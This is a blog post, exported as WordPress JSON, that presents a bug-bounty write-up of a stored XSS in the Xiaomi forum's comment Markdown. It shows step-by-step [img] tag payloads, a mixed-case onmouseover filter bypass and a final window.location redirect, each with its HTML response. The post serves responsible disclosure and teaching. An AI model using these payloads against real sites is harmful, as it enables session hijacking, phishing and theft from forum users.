{"id":57,"date":"2021-04-27T01:01:00","date_gmt":"2021-04-26T18:01:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=57"},"modified":"2025-10-14T17:57:57","modified_gmt":"2025-10-14T10:57:57","slug":"exploiting-xss-via-markdown-on-xiaomi","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/exploiting-xss-via-markdown-on-xiaomi\/","title":{"rendered":"Exploiting XSS via Markdown on Xiaomi"},"content":{"rendered":"\n<p>Markdown is a popular text-to-HTML conversion tool, commonly used in forums and web platforms to create web content. It allows users to write HTML in a simplified and easy-to-read format. While it\u2019s a convenient tool, if not properly sanitized, it can open up vulnerabilities, such as Cross-Site Scripting (XSS), which can be exploited by attackers to inject malicious code into a web application.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"883\" height=\"392\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2021\/04\/writeup-xiaomi1-1.png\" alt=\"\" class=\"wp-image-300\" style=\"width:492px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2021\/04\/writeup-xiaomi1-1.png 883w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2021\/04\/writeup-xiaomi1-1-300x133.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2021\/04\/writeup-xiaomi1-1-768x341.png 768w\" sizes=\"auto, (max-width: 883px) 100vw, 883px\" \/><\/figure>\n\n\n\n<p>In this writeup, I found an XSS vulnerability in the comments section of the Xiaomi Forum (c.mi.com), which allowed me to inject JavaScript through Markdown image tags. Here&#8217;s the process I followed to identify and test the vulnerability:<\/p>\n\n\n\n<p><strong>Step 1: Initial Test with Image Tag<\/strong> I began by attempting to post an image in the comments section using a standard Markdown image tag:<\/p>\n\n\n\n<p><strong>Payload:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;img]https:\/\/server\/image.jpg&#91;\/img]<\/code><\/pre>\n\n\n\n<p><strong>Response:<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;img src=\"https:\/\/server\/image.jpg\" \/><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">&lt;img<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">src<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">https:\/\/server\/image.jpg<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">\/&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>At this point, the image was displayed normally in the comments section, confirming that the Markdown was being converted into HTML without any issues. The application wasn\u2019t sanitizing the inputs at this stage, which could lead to potential security risks.<\/p>\n\n\n\n<p><strong>Step 2: Testing with Double Quotes<\/strong> Next, I tried injecting double quotes after the image URL, which is a common tactic to test for input sanitization:<\/p>\n\n\n\n<p><strong>Payload:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;img]https:\/\/server\/image.jpg\"&#91;\/img]<\/code><\/pre>\n\n\n\n<p><strong>Response:<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;img src=\"https:\/\/server\/image.jpg\"\" \/><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">&lt;img<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">src<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">https:\/\/server\/image.jpg<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #D8DEE9\">&quot;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">\/&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>As you can see, the double quote was included in the response, but the server did not sanitize it. This showed that it was still vulnerable to further manipulation with additional payloads.<\/p>\n\n\n\n<p><strong>Step 3: Inserting JavaScript Event Handler<\/strong> Next, I attempted to inject a JavaScript event handler into the image tag by adding the <code>onmouseover<\/code> attribute, which is commonly used to execute JavaScript when the user hovers over an element:<\/p>\n\n\n\n<p><strong>Payload:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;img]https:\/\/server\/image.jpg\"onmouseover=&#91;\/img]<\/code><\/pre>\n\n\n\n<p><strong>Response:<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;img src=\"https:\/\/server\/image.jpg%22onmouseover=\" \/><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">&lt;img<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">src<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">https:\/\/server\/image.jpg%22onmouseover=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">\/&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>However, the server immediately encoded the double quote (<code>\"<\/code>) into <code>%22<\/code>, preventing the JavaScript event handler from being executed. Despite this, the server still allowed the insertion of other potentially dangerous content, which was a step forward in exploiting the vulnerability.<\/p>\n\n\n\n<p><strong>Step 4: Using Uppercase in Event Handler<\/strong> To bypass the encoding, I tried using a mixed-case version of the event handler attribute, since sometimes case sensitivity can evade filters:<\/p>\n\n\n\n<p><strong>Payload:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;img]https:\/\/server\/image.jpg\"OnMoUsEoVeR=&#91;\/img]<\/code><\/pre>\n\n\n\n<p><strong>Response:<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;img src=\"https:\/\/server\/image.jpg\"OnMoUsEoVeR=\" \/><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">&lt;img<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">src<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">https:\/\/server\/image.jpg<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #8FBCBB\">OnMoUsEoVeR<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\"> \/&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>As expected, the server allowed the mixed-case event handler to be inserted, demonstrating that the input sanitization was insufficient and was unable to handle different case variations.<\/p>\n\n\n\n<p><strong>Step 5: Final Exploit with JavaScript Code<\/strong> Finally, I injected a malicious JavaScript payload that would redirect the victim\u2019s browser to an attacker-controlled site using the <code>window.location<\/code> property:<\/p>\n\n\n\n<p><strong>Payload:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;img]https:\/\/server\/image.jpg\"OnMoUsEoVeR=window.location=\"\/\/google.com&#91;\/img]<\/code><\/pre>\n\n\n\n<p><strong>Response:<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;img src=\"https:\/\/server\/image.jpg\"OnMoUsEoVeR=window.location=\"\/\/google.com\" \/><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">&lt;img<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">src<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">https:\/\/server\/image.jpg<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #8FBCBB\">OnMoUsEoVeR<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #A3BE8C\">window.location<\/span><span style=\"color: #D8DEE9\">=<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">\/\/google.com<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">\/&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>When the image was rendered, the <code>onmouseover<\/code> event would trigger the redirect to <code>google.com<\/code>. This is a clear demonstration of an XSS vulnerability, where an attacker can manipulate content on the forum to perform actions like redirecting users or executing arbitrary JavaScript in the victim&#8217;s browser.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"747\" height=\"52\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2021\/04\/writeup-xiaomi1-2.png\" alt=\"\" class=\"wp-image-297\" style=\"width:672px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2021\/04\/writeup-xiaomi1-2.png 747w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2021\/04\/writeup-xiaomi1-2-300x21.png 300w\" sizes=\"auto, (max-width: 747px) 100vw, 747px\" \/><\/figure>\n\n\n\n<p>Through this series of tests, I was able to confirm that the Xiaomi Forum&#8217;s comment section was vulnerable to <strong>Stored XSS<\/strong> due to inadequate sanitization of input within Markdown tags. The vulnerability could be exploited by an attacker to execute JavaScript in the context of a user&#8217;s browser, leading to potential phishing attacks, information theft, or session hijacking.<\/p>\n\n\n\n<p>I\u2019ve reported this issue responsibly to Xiaomi, and I hope they address it soon to improve the security of their platform.<\/p>\n\n\n\n<p>#HappyHacking<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Markdown is a popular text-to-HTML conversion tool, commonly used in forums and web platforms to create web content. It allows users to write HTML in a simplified and easy-to-read format. While it\u2019s a convenient tool, if not properly sanitized, it can open up vulnerabilities, such as Cross-Site Scripting (XSS), which can be exploited by attackers [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":61,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,9,8],"class_list":["post-57","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-cross-site-scripting","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/57","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=57"}],"version-history":[{"count":7,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/57\/revisions"}],"predecessor-version":[{"id":301,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/57\/revisions\/301"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/61"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=57"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=57"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=57"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}